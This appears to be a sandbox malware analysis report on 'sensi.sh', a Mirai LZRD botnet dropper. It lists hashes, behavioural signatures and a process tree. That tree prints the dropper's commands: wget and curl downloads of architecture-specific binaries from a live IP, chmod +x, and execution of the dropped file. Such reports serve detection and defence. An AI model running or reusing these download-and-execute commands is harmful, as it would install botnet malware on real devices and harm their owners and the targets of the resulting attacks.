Overview

overview

10

Static

static

1

sensi.sh

ubuntu-18.04-amd64

10

sensi.sh

debian-9-armhf

10

sensi.sh

debian-9-mips

10

sensi.sh

debian-9-mipsel

10

Analysis

  • max time kernel
    60s
  • max time network
    154s
  • platform
    ubuntu-18.04_amd64
  • resource
    ubuntu1804-amd64-20240611-en
  • resource tags

    arch:amd64arch:i386image:ubuntu1804-amd64-20240611-enkernel:4.15.0-213-genericlocale:en-usos:ubuntu-18.04-amd64system
  • submitted
    15-01-2025 06:58

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    sensi.sh

  • Size

    1KB

  • MD5

    b56a0716f8b4b73b0e35ebd7b66c03fa

  • SHA1

    d9711b6f58091fd794bf341dd7237136436a4a74

  • SHA256

    81bceab3472a818b061caa7d8d0bab3171bed77a3b5b86ceffae3fd2d16be12b

  • SHA512

    8bf2d0b7cd72d77fa84ab03edc5ac7e217bd122ffabbe370d3f5a10333e22ea44ab0c151c2b76dd9f819341b0eb0f48acce2b0c2b7391bc8a19e44df0c6e23aa

Score
10/10
mirailzrdbotnetdefense_evasiondiscoveryupx

Malware Config

Extracted

Family

mirai

Botnet

LZRD

Signatures

  • Mirai

    Mirai is a prevalent Linux malware infecting exposed network devices.

    botnetmirai
  • Mirai family
    mirai
  • Contacts a large (192661) amount of remote hosts 1 TTPs

    This may indicate a network scan to discover remotely running services.

    discovery
  • Creates a large amount of network flows 1 TTPs

    This may indicate a network scan to discover remotely running services.

    discovery
  • File and Directory Permissions Modification 1 TTPs 10 IoCs

    Adversaries may modify file or directory permissions to evade defenses.

    defense_evasion
  • Executes dropped EXE 10 IoCs
  • Modifies Watchdog functionality 1 TTPs 20 IoCs

    Malware like Mirai modifies the Watchdog to prevent it restarting an infected system.

    defense_evasion
  • Enumerates active TCP sockets 1 TTPs 10 IoCs

    Gets active TCP sockets from /proc virtual filesystem.

    discovery
  • Enumerates running processes

    Discovers information about currently running processes on the system

  • UPX packed file 1 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

    upx
  • Reads system network configuration 1 TTPs 10 IoCs

    Uses contents of /proc filesystem to enumerate network settings.

    discovery
  • Reads runtime system information 64 IoCs

    Reads data from /proc virtual filesystem.

    discovery
  • System Network Configuration Discovery 1 TTPs 2 IoCs

    Adversaries may gather information about the network configuration of a system.

    discovery
  • Writes file to tmp directory 21 IoCs

    Malware often drops required files in the /tmp directory.

Processes

  • /tmp/sensi.sh
    /tmp/sensi.sh
    1⤵
    • Writes file to tmp directory
    PID:1478
    • /bin/cp
      cp /bin/busybox /tmp/
      2⤵
      • Writes file to tmp directory
      PID:1479
    • /usr/bin/wget
      wget http://45.13.151.59/d/xd.x86
      2⤵
      • Writes file to tmp directory
      PID:1480
    • /usr/bin/curl
      curl -O http://45.13.151.59/d/xd.x86
      2⤵
      • Writes file to tmp directory
      PID:1491
    • /bin/cat
      cat xd.x86
      2⤵
        PID:1493
      • /bin/chmod
        chmod +x busybox config-err-wyp2Uv netplan_gsm552c4 sensi.sh snap-private-tmp SSH ssh-zLJyRkZwfWgF systemd-private-ab3d93cdee204eac989d9d97b6faf745-bolt.service-pXNYLF systemd-private-ab3d93cdee204eac989d9d97b6faf745-colord.service-dMsLxG systemd-private-ab3d93cdee204eac989d9d97b6faf745-ModemManager.service-XU1dQA systemd-private-ab3d93cdee204eac989d9d97b6faf745-systemd-resolved.service-xYf2P0 systemd-private-ab3d93cdee204eac989d9d97b6faf745-systemd-timedated.service-F19Xkn xd.x86
        2⤵
        • File and Directory Permissions Modification
        PID:1494
      • /tmp/SSH
        ./SSH
        2⤵
        • Executes dropped EXE
        • Modifies Watchdog functionality
        • Enumerates active TCP sockets
        • Reads system network configuration
        • Reads runtime system information
        PID:1495
      • /usr/bin/wget
        wget http://45.13.151.59/d/xd.mips
        2⤵
        • System Network Configuration Discovery
        • Writes file to tmp directory
        PID:1499
      • /usr/bin/curl
        curl -O http://45.13.151.59/d/xd.mips
        2⤵
        • System Network Configuration Discovery
        • Writes file to tmp directory
        PID:1503
      • /bin/chmod
        chmod +x busybox config-err-wyp2Uv netplan_gsm552c4 sensi.sh snap-private-tmp SSH ssh-zLJyRkZwfWgF systemd-private-ab3d93cdee204eac989d9d97b6faf745-bolt.service-pXNYLF systemd-private-ab3d93cdee204eac989d9d97b6faf745-colord.service-dMsLxG systemd-private-ab3d93cdee204eac989d9d97b6faf745-ModemManager.service-XU1dQA systemd-private-ab3d93cdee204eac989d9d97b6faf745-systemd-resolved.service-xYf2P0 systemd-private-ab3d93cdee204eac989d9d97b6faf745-systemd-timedated.service-F19Xkn xd.mips xd.x86
        2⤵
        • File and Directory Permissions Modification
        PID:1507
      • /tmp/SSH
        ./SSH
        2⤵
        • Executes dropped EXE
        • Modifies Watchdog functionality
        • Enumerates active TCP sockets
        • Reads system network configuration
        • Reads runtime system information
        PID:1508
      • /usr/bin/wget
        wget http://45.13.151.59/d/xd.mpsl
        2⤵
        • Writes file to tmp directory
        PID:1512
      • /usr/bin/curl
        curl -O http://45.13.151.59/d/xd.mpsl
        2⤵
        • Writes file to tmp directory
        PID:1516
      • /bin/chmod
        chmod +x busybox config-err-wyp2Uv netplan_gsm552c4 sensi.sh snap-private-tmp SSH ssh-zLJyRkZwfWgF systemd-private-ab3d93cdee204eac989d9d97b6faf745-bolt.service-pXNYLF systemd-private-ab3d93cdee204eac989d9d97b6faf745-colord.service-dMsLxG systemd-private-ab3d93cdee204eac989d9d97b6faf745-ModemManager.service-XU1dQA systemd-private-ab3d93cdee204eac989d9d97b6faf745-systemd-resolved.service-xYf2P0 systemd-private-ab3d93cdee204eac989d9d97b6faf745-systemd-timedated.service-F19Xkn xd.mips xd.mpsl xd.x86
        2⤵
        • File and Directory Permissions Modification
        PID:1518
      • /tmp/SSH
        ./SSH
        2⤵
        • Executes dropped EXE
        • Modifies Watchdog functionality
        • Enumerates active TCP sockets
        • Reads system network configuration
        • Reads runtime system information
        PID:1519
      • /usr/bin/wget
        wget http://45.13.151.59/d/xd.arm4
        2⤵
          PID:1523
        • /usr/bin/curl
          curl -O http://45.13.151.59/d/xd.arm4
          2⤵
          • Writes file to tmp directory
          PID:1527
        • /bin/chmod
          chmod +x busybox config-err-wyp2Uv netplan_gsm552c4 sensi.sh snap-private-tmp SSH ssh-zLJyRkZwfWgF systemd-private-ab3d93cdee204eac989d9d97b6faf745-bolt.service-pXNYLF systemd-private-ab3d93cdee204eac989d9d97b6faf745-colord.service-dMsLxG systemd-private-ab3d93cdee204eac989d9d97b6faf745-ModemManager.service-XU1dQA systemd-private-ab3d93cdee204eac989d9d97b6faf745-systemd-resolved.service-xYf2P0 systemd-private-ab3d93cdee204eac989d9d97b6faf745-systemd-timedated.service-F19Xkn xd.arm4 xd.mips xd.mpsl xd.x86
          2⤵
          • File and Directory Permissions Modification
          PID:1529
        • /tmp/SSH
          ./SSH
          2⤵
          • Executes dropped EXE
          • Modifies Watchdog functionality
          • Enumerates active TCP sockets
          • Reads system network configuration
          • Reads runtime system information
          PID:1530
        • /usr/bin/wget
          wget http://45.13.151.59/d/xd.arm5
          2⤵
          • Writes file to tmp directory
          PID:1534
        • /usr/bin/curl
          curl -O http://45.13.151.59/d/xd.arm5
          2⤵
          • Writes file to tmp directory
          PID:1540
        • /bin/chmod
          chmod +x busybox config-err-wyp2Uv netplan_gsm552c4 sensi.sh snap-private-tmp SSH ssh-zLJyRkZwfWgF systemd-private-ab3d93cdee204eac989d9d97b6faf745-bolt.service-pXNYLF systemd-private-ab3d93cdee204eac989d9d97b6faf745-colord.service-dMsLxG systemd-private-ab3d93cdee204eac989d9d97b6faf745-ModemManager.service-XU1dQA systemd-private-ab3d93cdee204eac989d9d97b6faf745-systemd-resolved.service-xYf2P0 systemd-private-ab3d93cdee204eac989d9d97b6faf745-systemd-timedated.service-F19Xkn xd.arm4 xd.arm5 xd.mips xd.mpsl xd.x86
          2⤵
          • File and Directory Permissions Modification
          PID:1542
        • /tmp/SSH
          ./SSH
          2⤵
          • Executes dropped EXE
          • Modifies Watchdog functionality
          • Enumerates active TCP sockets
          • Reads system network configuration
          • Reads runtime system information
          PID:1543
        • /usr/bin/wget
          wget http://45.13.151.59/d/xd.arm6
          2⤵
          • Writes file to tmp directory
          PID:1547
        • /usr/bin/curl
          curl -O http://45.13.151.59/d/xd.arm6
          2⤵
          • Writes file to tmp directory
          PID:1551
        • /bin/chmod
          chmod +x busybox config-err-wyp2Uv netplan_gsm552c4 sensi.sh snap-private-tmp SSH ssh-zLJyRkZwfWgF systemd-private-ab3d93cdee204eac989d9d97b6faf745-bolt.service-pXNYLF systemd-private-ab3d93cdee204eac989d9d97b6faf745-colord.service-dMsLxG systemd-private-ab3d93cdee204eac989d9d97b6faf745-ModemManager.service-XU1dQA systemd-private-ab3d93cdee204eac989d9d97b6faf745-systemd-resolved.service-xYf2P0 systemd-private-ab3d93cdee204eac989d9d97b6faf745-systemd-timedated.service-F19Xkn xd.arm4 xd.arm5 xd.arm6 xd.mips xd.mpsl xd.x86
          2⤵
          • File and Directory Permissions Modification
          PID:1555
        • /tmp/SSH
          ./SSH
          2⤵
          • Executes dropped EXE
          • Modifies Watchdog functionality
          • Enumerates active TCP sockets
          • Reads system network configuration
          • Reads runtime system information
          PID:1556
        • /usr/bin/wget
          wget http://45.13.151.59/d/xd.arm7
          2⤵
          • Writes file to tmp directory
          PID:1560
        • /usr/bin/curl
          curl -O http://45.13.151.59/d/xd.arm7
          2⤵
          • Writes file to tmp directory
          PID:1566
        • /bin/chmod
          chmod +x busybox config-err-wyp2Uv netplan_gsm552c4 sensi.sh snap-private-tmp SSH ssh-zLJyRkZwfWgF systemd-private-ab3d93cdee204eac989d9d97b6faf745-bolt.service-pXNYLF systemd-private-ab3d93cdee204eac989d9d97b6faf745-colord.service-dMsLxG systemd-private-ab3d93cdee204eac989d9d97b6faf745-ModemManager.service-XU1dQA systemd-private-ab3d93cdee204eac989d9d97b6faf745-systemd-resolved.service-xYf2P0 systemd-private-ab3d93cdee204eac989d9d97b6faf745-systemd-timedated.service-F19Xkn xd.arm4 xd.arm5 xd.arm6 xd.arm7 xd.mips xd.mpsl xd.x86
          2⤵
          • File and Directory Permissions Modification
          PID:1568
        • /tmp/SSH
          ./SSH
          2⤵
          • Executes dropped EXE
          • Modifies Watchdog functionality
          • Enumerates active TCP sockets
          • Reads system network configuration
          • Reads runtime system information
          PID:1569
        • /usr/bin/wget
          wget http://45.13.151.59/d/xd.ppc
          2⤵
          • Writes file to tmp directory
          PID:1573
        • /usr/bin/curl
          curl -O http://45.13.151.59/d/xd.ppc
          2⤵
          • Writes file to tmp directory
          PID:1577
        • /bin/chmod
          chmod +x busybox config-err-wyp2Uv netplan_gsm552c4 sensi.sh snap-private-tmp SSH ssh-zLJyRkZwfWgF systemd-private-ab3d93cdee204eac989d9d97b6faf745-bolt.service-pXNYLF systemd-private-ab3d93cdee204eac989d9d97b6faf745-colord.service-dMsLxG systemd-private-ab3d93cdee204eac989d9d97b6faf745-ModemManager.service-XU1dQA systemd-private-ab3d93cdee204eac989d9d97b6faf745-systemd-resolved.service-xYf2P0 systemd-private-ab3d93cdee204eac989d9d97b6faf745-systemd-timedated.service-F19Xkn xd.arm4 xd.arm5 xd.arm6 xd.arm7 xd.mips xd.mpsl xd.ppc xd.x86
          2⤵
          • File and Directory Permissions Modification
          PID:1580
        • /tmp/SSH
          ./SSH
          2⤵
          • Executes dropped EXE
          • Modifies Watchdog functionality
          • Enumerates active TCP sockets
          • Reads system network configuration
          • Reads runtime system information
          PID:1581
        • /usr/bin/wget
          wget http://45.13.151.59/d/xd.m68k
          2⤵
          • Writes file to tmp directory
          PID:1586
        • /usr/bin/curl
          curl -O http://45.13.151.59/d/xd.m68k
          2⤵
          • Writes file to tmp directory
          PID:1590
        • /bin/chmod
          chmod +x busybox config-err-wyp2Uv netplan_gsm552c4 sensi.sh snap-private-tmp SSH ssh-zLJyRkZwfWgF systemd-private-ab3d93cdee204eac989d9d97b6faf745-bolt.service-pXNYLF systemd-private-ab3d93cdee204eac989d9d97b6faf745-colord.service-dMsLxG systemd-private-ab3d93cdee204eac989d9d97b6faf745-ModemManager.service-XU1dQA systemd-private-ab3d93cdee204eac989d9d97b6faf745-systemd-resolved.service-xYf2P0 systemd-private-ab3d93cdee204eac989d9d97b6faf745-systemd-timedated.service-F19Xkn xd.arm4 xd.arm5 xd.arm6 xd.arm7 xd.m68k xd.mips xd.mpsl xd.ppc xd.x86
          2⤵
          • File and Directory Permissions Modification
          PID:1592
        • /tmp/SSH
          ./SSH
          2⤵
          • Executes dropped EXE
          • Modifies Watchdog functionality
          • Enumerates active TCP sockets
          • Reads system network configuration
          • Reads runtime system information
          PID:1593
        • /usr/bin/wget
          wget http://45.13.151.59/d/xd.sh4
          2⤵
          • Writes file to tmp directory
          PID:1597
        • /usr/bin/curl
          curl -O http://45.13.151.59/d/xd.sh4
          2⤵
          • Writes file to tmp directory
          PID:1601
        • /bin/chmod
          chmod +x busybox config-err-wyp2Uv netplan_gsm552c4 sensi.sh snap-private-tmp SSH ssh-zLJyRkZwfWgF systemd-private-ab3d93cdee204eac989d9d97b6faf745-bolt.service-pXNYLF systemd-private-ab3d93cdee204eac989d9d97b6faf745-colord.service-dMsLxG systemd-private-ab3d93cdee204eac989d9d97b6faf745-ModemManager.service-XU1dQA systemd-private-ab3d93cdee204eac989d9d97b6faf745-systemd-resolved.service-xYf2P0 systemd-private-ab3d93cdee204eac989d9d97b6faf745-systemd-timedated.service-F19Xkn xd.arm4 xd.arm5 xd.arm6 xd.arm7 xd.m68k xd.mips xd.mpsl xd.ppc xd.sh4 xd.x86
          2⤵
          • File and Directory Permissions Modification
          PID:1603
        • /tmp/SSH
          ./SSH
          2⤵
          • Executes dropped EXE
          • Modifies Watchdog functionality
          • Enumerates active TCP sockets
          • Reads system network configuration
          • Reads runtime system information
          PID:1604

      Network

      MITRE ATT&CK Enterprise v15

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • /tmp/SSH
        Filesize

        29KB

        MD5

        cb02e84a85813c662f7191cc1d19685f

        SHA1

        59ad600226c432b1b8c3a077be7a6c280c2da1a1

        SHA256

        3aff058d7b58eb91ccde83818aae5dd597aae06d96ab89c080c0a3d88f877f31

        SHA512

        ea9bea2cb21045791f611089d04714ef109dfc77d462763811bd4ce0dfeae93e7b6bd26637ccfc32e840504de17bf7da45ec29f0639f724de77ea985226e2f82

        Download Submit

      • /tmp/busybox
        Filesize

        2.0MB

        MD5

        b4dede5fc0b1bad5cb8e901bde126b97

        SHA1

        10cbe9a418ad84a1ed297948539d37aeb58dd810

        SHA256

        a9f0735d28f9a6a4f2634d3b144156f7b3df3b476a16a5ab0c7bdf98d74dd020

        SHA512

        45665ce3a42f63a01fdef517e0c4cb943efce64c8a32d3ce07ab4f1fafc23cda77f378d324342efc79dc9d2293c4b4454d06c1cf4997b9e866784de01cb546e6

        Download Submit